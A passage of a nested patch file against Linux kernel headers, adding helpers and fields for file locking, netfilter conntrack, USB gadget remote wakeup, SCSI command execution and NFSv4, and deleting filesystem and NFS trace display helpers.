+ #define EFI_DXE_SERVICES_TABLE_GUID		EFI_GUID(0x05ad34ba, 0x6f02, 0x4214,  0x95, 0x2e, 0x4d, 0xa0, 0x39, 0x8e, 0x2b, 0xb9)
+ #define EFI_SMBIOS_PROTOCOL_GUID		EFI_GUID(0x03583ff6, 0xcb36, 0x4940,  0x94, 0x7e, 0xb9, 0xb3, 0x9f, 0x4a, 0xfa, 0xf7)
++#define EFI_MEMORY_ATTRIBUTE_PROTOCOL_GUID	EFI_GUID(0xf4560cf6, 0x40ec, 0x4b4a,  0xa1, 0x92, 0xbf, 0x1d, 0x57, 0xd0, 0xb1, 0x89)
+ 
+ #define EFI_IMAGE_SECURITY_DATABASE_GUID	EFI_GUID(0xd719b2cb, 0x3d3a, 0x4596,  0xa3, 0xbc, 0xda, 0xd0, 0x0e, 0x67, 0x65, 0x6f)
+ #define EFI_SHIM_LOCK_GUID			EFI_GUID(0x605dab50, 0xe046, 0x4300,  0xab, 0xb6, 0x3d, 0xd8, 0x10, 0xdd, 0x8b, 0x23)
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 67313881f8ac1..092d8fa10153f 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1189,6 +1189,13 @@ extern void show_fd_locks(struct seq_file *f,
+ 			 struct file *filp, struct files_struct *files);
+ extern bool locks_owner_has_blockers(struct file_lock_context *flctx,
+ 			fl_owner_t owner);
++
++static inline struct file_lock_context *
++locks_inode_context(const struct inode *inode)
++{
++	return smp_load_acquire(&inode->i_flctx);
++}
++
+ #else /* !CONFIG_FILE_LOCKING */
+ static inline int fcntl_getlk(struct file *file, unsigned int cmd,
+ 			      struct flock __user *user)
+@@ -1334,6 +1341,13 @@ static inline bool locks_owner_has_blockers(struct file_lock_context *flctx,
+ {
+ 	return false;
+ }
++
++static inline struct file_lock_context *
++locks_inode_context(const struct inode *inode)
++{
++	return NULL;
++}
++
+ #endif /* !CONFIG_FILE_LOCKING */
+ 
+ static inline struct inode *file_inode(const struct file *f)
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index bef8db9d6c085..e5f4b6f8d1c09 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -437,11 +437,13 @@ nf_nat_decode_session(struct sk_buff *skb, struct flowi *fl, u_int8_t family)
+ #include <linux/netfilter/nf_conntrack_zones_common.h>
+ 
+ void nf_ct_attach(struct sk_buff *, const struct sk_buff *);
++void nf_ct_set_closing(struct nf_conntrack *nfct);
+ struct nf_conntrack_tuple;
+ bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 			 const struct sk_buff *skb);
+ #else
+ static inline void nf_ct_attach(struct sk_buff *new, struct sk_buff *skb) {}
++static inline void nf_ct_set_closing(struct nf_conntrack *nfct) {}
+ struct nf_conntrack_tuple;
+ static inline bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 				       const struct sk_buff *skb)
+@@ -459,6 +461,8 @@ struct nf_ct_hook {
+ 	bool (*get_tuple_skb)(struct nf_conntrack_tuple *,
+ 			      const struct sk_buff *);
+ 	void (*attach)(struct sk_buff *nskb, const struct sk_buff *skb);
++	void (*set_closing)(struct nf_conntrack *nfct);
++	int (*confirm)(struct sk_buff *skb);
+ };
+ extern const struct nf_ct_hook __rcu *nf_ct_hook;
+ 
+diff --git a/include/linux/nfs4.h b/include/linux/nfs4.h
+index 8d04b6a5964c4..730003c4f4af4 100644
+--- a/include/linux/nfs4.h
++++ b/include/linux/nfs4.h
+@@ -732,4 +732,17 @@ enum nfs4_setxattr_options {
+ 	SETXATTR4_CREATE	= 1,
+ 	SETXATTR4_REPLACE	= 2,
+ };
++
++enum {
++	RCA4_TYPE_MASK_RDATA_DLG	= 0,
++	RCA4_TYPE_MASK_WDATA_DLG	= 1,
++	RCA4_TYPE_MASK_DIR_DLG		= 2,
++	RCA4_TYPE_MASK_FILE_LAYOUT	= 3,
++	RCA4_TYPE_MASK_BLK_LAYOUT	= 4,
++	RCA4_TYPE_MASK_OBJ_LAYOUT_MIN	= 8,
++	RCA4_TYPE_MASK_OBJ_LAYOUT_MAX	= 9,
++	RCA4_TYPE_MASK_OTHER_LAYOUT_MIN	= 12,
++	RCA4_TYPE_MASK_OTHER_LAYOUT_MAX	= 15,
++};
++
+ #endif
+diff --git a/include/linux/usb/composite.h b/include/linux/usb/composite.h
+index 43ac3fa760dbe..9783b9107d76b 100644
+--- a/include/linux/usb/composite.h
++++ b/include/linux/usb/composite.h
+@@ -412,6 +412,8 @@ extern int composite_dev_prepare(struct usb_composite_driver *composite,
+ extern int composite_os_desc_req_prepare(struct usb_composite_dev *cdev,
+ 					 struct usb_ep *ep0);
+ void composite_dev_cleanup(struct usb_composite_dev *cdev);
++void check_remote_wakeup_config(struct usb_gadget *g,
++				struct usb_configuration *c);
+ 
+ static inline struct usb_composite_driver *to_cdriver(
+ 		struct usb_gadget_driver *gdrv)
+diff --git a/include/linux/usb/gadget.h b/include/linux/usb/gadget.h
+index dc3092cea99e9..5bec668b41dcd 100644
+--- a/include/linux/usb/gadget.h
++++ b/include/linux/usb/gadget.h
+@@ -309,6 +309,7 @@ struct usb_udc;
+ struct usb_gadget_ops {
+ 	int	(*get_frame)(struct usb_gadget *);
+ 	int	(*wakeup)(struct usb_gadget *);
++	int	(*set_remote_wakeup)(struct usb_gadget *, int set);
+ 	int	(*set_selfpowered) (struct usb_gadget *, int is_selfpowered);
+ 	int	(*vbus_session) (struct usb_gadget *, int is_active);
+ 	int	(*vbus_draw) (struct usb_gadget *, unsigned mA);
+@@ -383,6 +384,8 @@ struct usb_gadget_ops {
+  * @connected: True if gadget is connected.
+  * @lpm_capable: If the gadget max_speed is FULL or HIGH, this flag
+  *	indicates that it supports LPM as per the LPM ECN & errata.
++ * @wakeup_capable: True if gadget is capable of sending remote wakeup.
++ * @wakeup_armed: True if gadget is armed by the host for remote wakeup.
+  * @irq: the interrupt number for device controller.
+  * @id_number: a unique ID number for ensuring that gadget names are distinct
+  *
+@@ -444,6 +447,8 @@ struct usb_gadget {
+ 	unsigned			deactivated:1;
+ 	unsigned			connected:1;
+ 	unsigned			lpm_capable:1;
++	unsigned			wakeup_capable:1;
++	unsigned			wakeup_armed:1;
+ 	int				irq;
+ 	int				id_number;
+ };
+@@ -600,6 +605,7 @@ static inline int gadget_is_otg(struct usb_gadget *g)
+ #if IS_ENABLED(CONFIG_USB_GADGET)
+ int usb_gadget_frame_number(struct usb_gadget *gadget);
+ int usb_gadget_wakeup(struct usb_gadget *gadget);
++int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set);
+ int usb_gadget_set_selfpowered(struct usb_gadget *gadget);
+ int usb_gadget_clear_selfpowered(struct usb_gadget *gadget);
+ int usb_gadget_vbus_connect(struct usb_gadget *gadget);
+@@ -615,6 +621,8 @@ static inline int usb_gadget_frame_number(struct usb_gadget *gadget)
+ { return 0; }
+ static inline int usb_gadget_wakeup(struct usb_gadget *gadget)
+ { return 0; }
++static inline int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set)
++{ return 0; }
+ static inline int usb_gadget_set_selfpowered(struct usb_gadget *gadget)
+ { return 0; }
+ static inline int usb_gadget_clear_selfpowered(struct usb_gadget *gadget)
+diff --git a/include/net/ipv6_stubs.h b/include/net/ipv6_stubs.h
+index c48186bf47372..21da31e1dff5d 100644
+--- a/include/net/ipv6_stubs.h
++++ b/include/net/ipv6_stubs.h
+@@ -85,6 +85,11 @@ struct ipv6_bpf_stub {
+ 			       sockptr_t optval, unsigned int optlen);
+ 	int (*ipv6_getsockopt)(struct sock *sk, int level, int optname,
+ 			       sockptr_t optval, sockptr_t optlen);
++	int (*ipv6_dev_get_saddr)(struct net *net,
++				  const struct net_device *dst_dev,
++				  const struct in6_addr *daddr,
++				  unsigned int prefs,
++				  struct in6_addr *saddr);
+ };
+ extern const struct ipv6_bpf_stub *ipv6_bpf_stub __read_mostly;
+ 
+diff --git a/include/net/mctp.h b/include/net/mctp.h
+index 82800d521c3de..7ed84054f4623 100644
+--- a/include/net/mctp.h
++++ b/include/net/mctp.h
+@@ -249,6 +249,7 @@ struct mctp_route {
+ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ 				     mctp_eid_t daddr);
+ 
++/* always takes ownership of skb */
+ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		      struct sk_buff *skb, mctp_eid_t daddr, u8 req_tag);
+ 
+diff --git a/include/net/netfilter/nf_conntrack.h b/include/net/netfilter/nf_conntrack.h
+index 6a2019aaa4644..3dbf947285be2 100644
+--- a/include/net/netfilter/nf_conntrack.h
++++ b/include/net/netfilter/nf_conntrack.h
+@@ -125,6 +125,12 @@ struct nf_conn {
+ 	union nf_conntrack_proto proto;
+ };
+ 
++static inline struct nf_conn *
++nf_ct_to_nf_conn(const struct nf_conntrack *nfct)
++{
++	return container_of(nfct, struct nf_conn, ct_general);
++}
++
+ static inline struct nf_conn *
+ nf_ct_tuplehash_to_ctrack(const struct nf_conntrack_tuple_hash *hash)
+ {
+@@ -175,6 +181,8 @@ nf_ct_get(const struct sk_buff *skb, enum ip_conntrack_info *ctinfo)
+ 
+ void nf_ct_destroy(struct nf_conntrack *nfct);
+ 
++void nf_conntrack_tcp_set_closing(struct nf_conn *ct);
++
+ /* decrement reference count on a conntrack */
+ static inline void nf_ct_put(struct nf_conn *ct)
+ {
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index d2751ed536df2..a64713fe52640 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -204,6 +204,7 @@ struct scsi_device {
+ 	unsigned use_10_for_rw:1; /* first try 10-byte read / write */
+ 	unsigned use_10_for_ms:1; /* first try 10-byte mode sense/select */
+ 	unsigned set_dbd_for_ms:1; /* Set "DBD" field in mode sense */
++	unsigned read_before_ms:1;	/* perform a READ before MODE SENSE */
+ 	unsigned no_report_opcodes:1;	/* no REPORT SUPPORTED OPERATION CODES */
+ 	unsigned no_write_same:1;	/* no WRITE SAME command */
+ 	unsigned use_16_for_rw:1; /* Use read/write(16) over read/write(10) */
+@@ -479,28 +480,51 @@ extern const char *scsi_device_state_name(enum scsi_device_state);
+ extern int scsi_is_sdev_device(const struct device *);
+ extern int scsi_is_target_device(const struct device *);
+ extern void scsi_sanitize_inquiry_string(unsigned char *s, int len);
+-extern int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+-			int data_direction, void *buffer, unsigned bufflen,
+-			unsigned char *sense, struct scsi_sense_hdr *sshdr,
+-			int timeout, int retries, blk_opf_t flags,
+-			req_flags_t rq_flags, int *resid);
++
++/* Optional arguments to scsi_execute_cmd */
++struct scsi_exec_args {
++	unsigned char *sense;		/* sense buffer */
++	unsigned int sense_len;		/* sense buffer len */
++	struct scsi_sense_hdr *sshdr;	/* decoded sense header */
++	blk_mq_req_flags_t req_flags;	/* BLK_MQ_REQ flags */
++	int *resid;			/* residual length */
++};
++
++int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
++		     blk_opf_t opf, void *buffer, unsigned int bufflen,
++		     int timeout, int retries,
++		     const struct scsi_exec_args *args);
++
+ /* Make sure any sense buffer is the correct size. */
+-#define scsi_execute(sdev, cmd, data_direction, buffer, bufflen, sense,	\
+-		     sshdr, timeout, retries, flags, rq_flags, resid)	\
++#define scsi_execute(_sdev, _cmd, _data_dir, _buffer, _bufflen, _sense,	\
++		     _sshdr, _timeout, _retries, _flags, _rq_flags,	\
++		     _resid)						\
+ ({									\
+-	BUILD_BUG_ON((sense) != NULL &&					\
+-		     sizeof(sense) != SCSI_SENSE_BUFFERSIZE);		\
+-	__scsi_execute(sdev, cmd, data_direction, buffer, bufflen,	\
+-		       sense, sshdr, timeout, retries, flags, rq_flags,	\
+-		       resid);						\
++	scsi_execute_cmd(_sdev, _cmd, (_data_dir == DMA_TO_DEVICE ?	\
++			 REQ_OP_DRV_OUT : REQ_OP_DRV_IN) | _flags,	\
++			 _buffer, _bufflen, _timeout, _retries,	\
++			 &(struct scsi_exec_args) {			\
++				.sense = _sense,			\
++				.sshdr = _sshdr,			\
++				.req_flags = _rq_flags & RQF_PM  ?	\
++						BLK_MQ_REQ_PM : 0,	\
++				.resid = _resid,			\
++			 });						\
+ })
++
+ static inline int scsi_execute_req(struct scsi_device *sdev,
+ 	const unsigned char *cmd, int data_direction, void *buffer,
+ 	unsigned bufflen, struct scsi_sense_hdr *sshdr, int timeout,
+ 	int retries, int *resid)
+ {
+-	return scsi_execute(sdev, cmd, data_direction, buffer,
+-		bufflen, NULL, sshdr, timeout, retries,  0, 0, resid);
++	return scsi_execute_cmd(sdev, cmd,
++				data_direction == DMA_TO_DEVICE ?
++				REQ_OP_DRV_OUT : REQ_OP_DRV_IN, buffer,
++				bufflen, timeout, retries,
++				&(struct scsi_exec_args) {
++					.sshdr = sshdr,
++					.resid = resid,
++				});
+ }
+ extern void sdev_disable_disk_events(struct scsi_device *sdev);
+ extern void sdev_enable_disk_events(struct scsi_device *sdev);
+diff --git a/include/trace/events/fs.h b/include/trace/events/fs.h
+deleted file mode 100644
+index 738b97f22f365..0000000000000
+--- a/include/trace/events/fs.h
++++ /dev/null
+@@ -1,122 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Display helpers for generic filesystem items
+- *
+- * Author: Chuck Lever <chuck.lever@oracle.com>
+- *
+- * Copyright (c) 2020, Oracle and/or its affiliates.
+- */
+-
+-#include <linux/fs.h>
+-
+-#define show_fs_dirent_type(x) \
+-	__print_symbolic(x, \
+-		{ DT_UNKNOWN,		"UNKNOWN" }, \
+-		{ DT_FIFO,		"FIFO" }, \
+-		{ DT_CHR,		"CHR" }, \
+-		{ DT_DIR,		"DIR" }, \
+-		{ DT_BLK,		"BLK" }, \
+-		{ DT_REG,		"REG" }, \
+-		{ DT_LNK,		"LNK" }, \
+-		{ DT_SOCK,		"SOCK" }, \
+-		{ DT_WHT,		"WHT" })
+-
+-#define show_fs_fcntl_open_flags(x) \
+-	__print_flags(x, "|", \
+-		{ O_WRONLY,		"O_WRONLY" }, \
+-		{ O_RDWR,		"O_RDWR" }, \
+-		{ O_CREAT,		"O_CREAT" }, \
+-		{ O_EXCL,		"O_EXCL" }, \
+-		{ O_NOCTTY,		"O_NOCTTY" }, \
+-		{ O_TRUNC,		"O_TRUNC" }, \
+-		{ O_APPEND,		"O_APPEND" }, \
+-		{ O_NONBLOCK,		"O_NONBLOCK" }, \
+-		{ O_DSYNC,		"O_DSYNC" }, \
+-		{ O_DIRECT,		"O_DIRECT" }, \
+-		{ O_LARGEFILE,		"O_LARGEFILE" }, \
+-		{ O_DIRECTORY,		"O_DIRECTORY" }, \
+-		{ O_NOFOLLOW,		"O_NOFOLLOW" }, \
+-		{ O_NOATIME,		"O_NOATIME" }, \
+-		{ O_CLOEXEC,		"O_CLOEXEC" })
+-
+-#define __fmode_flag(x)	{ (__force unsigned long)FMODE_##x, #x }
+-#define show_fs_fmode_flags(x) \
+-	__print_flags(x, "|", \
+-		__fmode_flag(READ), \
+-		__fmode_flag(WRITE), \
+-		__fmode_flag(EXEC))
+-
+-#ifdef CONFIG_64BIT
+-#define show_fs_fcntl_cmd(x) \
+-	__print_symbolic(x, \
+-		{ F_DUPFD,		"DUPFD" }, \
+-		{ F_GETFD,		"GETFD" }, \
+-		{ F_SETFD,		"SETFD" }, \
+-		{ F_GETFL,		"GETFL" }, \
+-		{ F_SETFL,		"SETFL" }, \
+-		{ F_GETLK,		"GETLK" }, \
+-		{ F_SETLK,		"SETLK" }, \
+-		{ F_SETLKW,		"SETLKW" }, \
+-		{ F_SETOWN,		"SETOWN" }, \
+-		{ F_GETOWN,		"GETOWN" }, \
+-		{ F_SETSIG,		"SETSIG" }, \
+-		{ F_GETSIG,		"GETSIG" }, \
+-		{ F_SETOWN_EX,		"SETOWN_EX" }, \
+-		{ F_GETOWN_EX,		"GETOWN_EX" }, \
+-		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
+-		{ F_OFD_GETLK,		"OFD_GETLK" }, \
+-		{ F_OFD_SETLK,		"OFD_SETLK" }, \
+-		{ F_OFD_SETLKW,		"OFD_SETLKW" })
+-#else /* CONFIG_64BIT */
+-#define show_fs_fcntl_cmd(x) \
+-	__print_symbolic(x, \
+-		{ F_DUPFD,		"DUPFD" }, \
+-		{ F_GETFD,		"GETFD" }, \
+-		{ F_SETFD,		"SETFD" }, \
+-		{ F_GETFL,		"GETFL" }, \
+-		{ F_SETFL,		"SETFL" }, \
+-		{ F_GETLK,		"GETLK" }, \
+-		{ F_SETLK,		"SETLK" }, \
+-		{ F_SETLKW,		"SETLKW" }, \
+-		{ F_SETOWN,		"SETOWN" }, \
+-		{ F_GETOWN,		"GETOWN" }, \
+-		{ F_SETSIG,		"SETSIG" }, \
+-		{ F_GETSIG,		"GETSIG" }, \
+-		{ F_GETLK64,		"GETLK64" }, \
+-		{ F_SETLK64,		"SETLK64" }, \
+-		{ F_SETLKW64,		"SETLKW64" }, \
+-		{ F_SETOWN_EX,		"SETOWN_EX" }, \
+-		{ F_GETOWN_EX,		"GETOWN_EX" }, \
+-		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
+-		{ F_OFD_GETLK,		"OFD_GETLK" }, \
+-		{ F_OFD_SETLK,		"OFD_SETLK" }, \
+-		{ F_OFD_SETLKW,		"OFD_SETLKW" })
+-#endif /* CONFIG_64BIT */
+-
+-#define show_fs_fcntl_lock_type(x) \
+-	__print_symbolic(x, \
+-		{ F_RDLCK,		"RDLCK" }, \
+-		{ F_WRLCK,		"WRLCK" }, \
+-		{ F_UNLCK,		"UNLCK" })
+-
+-#define show_fs_lookup_flags(flags) \
+-	__print_flags(flags, "|", \
+-		{ LOOKUP_FOLLOW,	"FOLLOW" }, \
+-		{ LOOKUP_DIRECTORY,	"DIRECTORY" }, \
+-		{ LOOKUP_AUTOMOUNT,	"AUTOMOUNT" }, \
+-		{ LOOKUP_EMPTY,		"EMPTY" }, \
+-		{ LOOKUP_DOWN,		"DOWN" }, \
+-		{ LOOKUP_MOUNTPOINT,	"MOUNTPOINT" }, \
+-		{ LOOKUP_REVAL,		"REVAL" }, \
+-		{ LOOKUP_RCU,		"RCU" }, \
+-		{ LOOKUP_OPEN,		"OPEN" }, \
+-		{ LOOKUP_CREATE,	"CREATE" }, \
+-		{ LOOKUP_EXCL,		"EXCL" }, \
+-		{ LOOKUP_RENAME_TARGET,	"RENAME_TARGET" }, \
+-		{ LOOKUP_PARENT,	"PARENT" }, \
+-		{ LOOKUP_NO_SYMLINKS,	"NO_SYMLINKS" }, \
+-		{ LOOKUP_NO_MAGICLINKS,	"NO_MAGICLINKS" }, \
+-		{ LOOKUP_NO_XDEV,	"NO_XDEV" }, \
+-		{ LOOKUP_BENEATH,	"BENEATH" }, \
+-		{ LOOKUP_IN_ROOT,	"IN_ROOT" }, \
+-		{ LOOKUP_CACHED,	"CACHED" })
+diff --git a/include/trace/events/nfs.h b/include/trace/events/nfs.h
+deleted file mode 100644
+index 09ffdbb04134d..0000000000000
+--- a/include/trace/events/nfs.h
++++ /dev/null
+@@ -1,375 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Display helpers for NFS protocol elements
+- *
+- * Author: Chuck Lever <chuck.lever@oracle.com>
+- *
+- * Copyright (c) 2020, Oracle and/or its affiliates.
+- */
+-
+-#include <linux/nfs.h>
+-#include <linux/nfs4.h>
+-#include <uapi/linux/nfs.h>
+-
+-TRACE_DEFINE_ENUM(NFS_OK);
+-TRACE_DEFINE_ENUM(NFSERR_PERM);
+-TRACE_DEFINE_ENUM(NFSERR_NOENT);
+-TRACE_DEFINE_ENUM(NFSERR_IO);
+-TRACE_DEFINE_ENUM(NFSERR_NXIO);
+-TRACE_DEFINE_ENUM(NFSERR_EAGAIN);
+-TRACE_DEFINE_ENUM(NFSERR_ACCES);
+-TRACE_DEFINE_ENUM(NFSERR_EXIST);
+-TRACE_DEFINE_ENUM(NFSERR_XDEV);
+-TRACE_DEFINE_ENUM(NFSERR_NODEV);
+-TRACE_DEFINE_ENUM(NFSERR_NOTDIR);
+-TRACE_DEFINE_ENUM(NFSERR_ISDIR);
+-TRACE_DEFINE_ENUM(NFSERR_INVAL);
+-TRACE_DEFINE_ENUM(NFSERR_FBIG);
+-TRACE_DEFINE_ENUM(NFSERR_NOSPC);
+-TRACE_DEFINE_ENUM(NFSERR_ROFS);
+-TRACE_DEFINE_ENUM(NFSERR_MLINK);
+-TRACE_DEFINE_ENUM(NFSERR_OPNOTSUPP);
+-TRACE_DEFINE_ENUM(NFSERR_NAMETOOLONG);
+-TRACE_DEFINE_ENUM(NFSERR_NOTEMPTY);
+-TRACE_DEFINE_ENUM(NFSERR_DQUOT);
+-TRACE_DEFINE_ENUM(NFSERR_STALE);
+-TRACE_DEFINE_ENUM(NFSERR_REMOTE);
+-TRACE_DEFINE_ENUM(NFSERR_WFLUSH);
+-TRACE_DEFINE_ENUM(NFSERR_BADHANDLE);
+-TRACE_DEFINE_ENUM(NFSERR_NOT_SYNC);
+-TRACE_DEFINE_ENUM(NFSERR_BAD_COOKIE);
+-TRACE_DEFINE_ENUM(NFSERR_NOTSUPP);
+-TRACE_DEFINE_ENUM(NFSERR_TOOSMALL);
+-TRACE_DEFINE_ENUM(NFSERR_SERVERFAULT);
+-TRACE_DEFINE_ENUM(NFSERR_BADTYPE);
+-TRACE_DEFINE_ENUM(NFSERR_JUKEBOX);
+-
+-#define show_nfs_status(x) \
+-	__print_symbolic(x, \
+-		{ NFS_OK,			"OK" }, \
+-		{ NFSERR_PERM,			"PERM" }, \
+-		{ NFSERR_NOENT,			"NOENT" }, \
+-		{ NFSERR_IO,			"IO" }, \
+-		{ NFSERR_NXIO,			"NXIO" }, \
+-		{ ECHILD,			"CHILD" }, \
+-		{ NFSERR_EAGAIN,		"AGAIN" }, \
+-		{ NFSERR_ACCES,			"ACCES" }, \
+-		{ NFSERR_EXIST,			"EXIST" }, \
+-		{ NFSERR_XDEV,			"XDEV" }, \
+-		{ NFSERR_NODEV,			"NODEV" }, \
+-		{ NFSERR_NOTDIR,		"NOTDIR" }, \
+-		{ NFSERR_ISDIR,			"ISDIR" }, \
+-		{ NFSERR_INVAL,			"INVAL" }, \
+-		{ NFSERR_FBIG,			"FBIG" }, \
+-		{ NFSERR_NOSPC,			"NOSPC" }, \
+-		{ NFSERR_ROFS,			"ROFS" }, \
+-		{ NFSERR_MLINK,			"MLINK" }, \
+-		{ NFSERR_OPNOTSUPP,		"OPNOTSUPP" }, \
+-		{ NFSERR_NAMETOOLONG,		"NAMETOOLONG" }, \
+-		{ NFSERR_NOTEMPTY,		"NOTEMPTY" }, \
+-		{ NFSERR_DQUOT,			"DQUOT" }, \
+-		{ NFSERR_STALE,			"STALE" }, \
+-		{ NFSERR_REMOTE,		"REMOTE" }, \
+-		{ NFSERR_WFLUSH,		"WFLUSH" }, \
+-		{ NFSERR_BADHANDLE,		"BADHANDLE" }, \
+-		{ NFSERR_NOT_SYNC,		"NOTSYNC" }, \
+-		{ NFSERR_BAD_COOKIE,		"BADCOOKIE" }, \
+-		{ NFSERR_NOTSUPP,		"NOTSUPP" }, \
+-		{ NFSERR_TOOSMALL,		"TOOSMALL" }, \
+-		{ NFSERR_SERVERFAULT,		"REMOTEIO" }, \
+-		{ NFSERR_BADTYPE,		"BADTYPE" }, \
+-		{ NFSERR_JUKEBOX,		"JUKEBOX" })
+-
+-TRACE_DEFINE_ENUM(NFS_UNSTABLE);
+-TRACE_DEFINE_ENUM(NFS_DATA_SYNC);
+-TRACE_DEFINE_ENUM(NFS_FILE_SYNC);
+-
+-#define show_nfs_stable_how(x) \
+-	__print_symbolic(x, \
+-		{ NFS_UNSTABLE,			"UNSTABLE" }, \
+-		{ NFS_DATA_SYNC,		"DATA_SYNC" }, \
+-		{ NFS_FILE_SYNC,		"FILE_SYNC" })
+-
+-TRACE_DEFINE_ENUM(NFS4_OK);
+-TRACE_DEFINE_ENUM(NFS4ERR_ACCESS);
+-TRACE_DEFINE_ENUM(NFS4ERR_ATTRNOTSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_ADMIN_REVOKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_BACK_CHAN_BUSY);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADCHAR);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADHANDLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADIOMODE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADLAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADLABEL);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADNAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADOWNER);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADSESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADSLOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADTYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BADXDR);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_COOKIE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_HIGH_SLOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_RANGE);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_SEQID);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_SESSION_DIGEST);
+-TRACE_DEFINE_ENUM(NFS4ERR_BAD_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_CB_PATH_DOWN);
+-TRACE_DEFINE_ENUM(NFS4ERR_CLID_INUSE);
+-TRACE_DEFINE_ENUM(NFS4ERR_CLIENTID_BUSY);
+-TRACE_DEFINE_ENUM(NFS4ERR_COMPLETE_ALREADY);
+-TRACE_DEFINE_ENUM(NFS4ERR_CONN_NOT_BOUND_TO_SESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_DEADLOCK);
+-TRACE_DEFINE_ENUM(NFS4ERR_DEADSESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELAY);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELEG_ALREADY_WANTED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DELEG_REVOKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DENIED);
+-TRACE_DEFINE_ENUM(NFS4ERR_DIRDELEG_UNAVAIL);
+-TRACE_DEFINE_ENUM(NFS4ERR_DQUOT);
+-TRACE_DEFINE_ENUM(NFS4ERR_ENCR_ALG_UNSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_EXIST);
+-TRACE_DEFINE_ENUM(NFS4ERR_EXPIRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_FBIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_FHEXPIRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_FILE_OPEN);
+-TRACE_DEFINE_ENUM(NFS4ERR_GRACE);
+-TRACE_DEFINE_ENUM(NFS4ERR_HASH_ALG_UNSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_INVAL);
+-TRACE_DEFINE_ENUM(NFS4ERR_IO);
+-TRACE_DEFINE_ENUM(NFS4ERR_ISDIR);
+-TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTTRYLATER);
+-TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTUNAVAILABLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_LEASE_MOVED);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCKED);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCKS_HELD);
+-TRACE_DEFINE_ENUM(NFS4ERR_LOCK_RANGE);
+-TRACE_DEFINE_ENUM(NFS4ERR_MINOR_VERS_MISMATCH);
+-TRACE_DEFINE_ENUM(NFS4ERR_MLINK);
+-TRACE_DEFINE_ENUM(NFS4ERR_MOVED);
+-TRACE_DEFINE_ENUM(NFS4ERR_NAMETOOLONG);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOENT);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOFILEHANDLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOMATCHING_LAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOSPC);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTDIR);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTEMPTY);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOTSUPP);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOT_ONLY_OP);
+-TRACE_DEFINE_ENUM(NFS4ERR_NOT_SAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_NO_GRACE);
+-TRACE_DEFINE_ENUM(NFS4ERR_NXIO);
+-TRACE_DEFINE_ENUM(NFS4ERR_OLD_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_OPENMODE);
+-TRACE_DEFINE_ENUM(NFS4ERR_OP_ILLEGAL);
+-TRACE_DEFINE_ENUM(NFS4ERR_OP_NOT_IN_SESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_PERM);
+-TRACE_DEFINE_ENUM(NFS4ERR_PNFS_IO_HOLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_PNFS_NO_LAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECALLCONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_BAD);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_CONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_REJECT_DELEG);
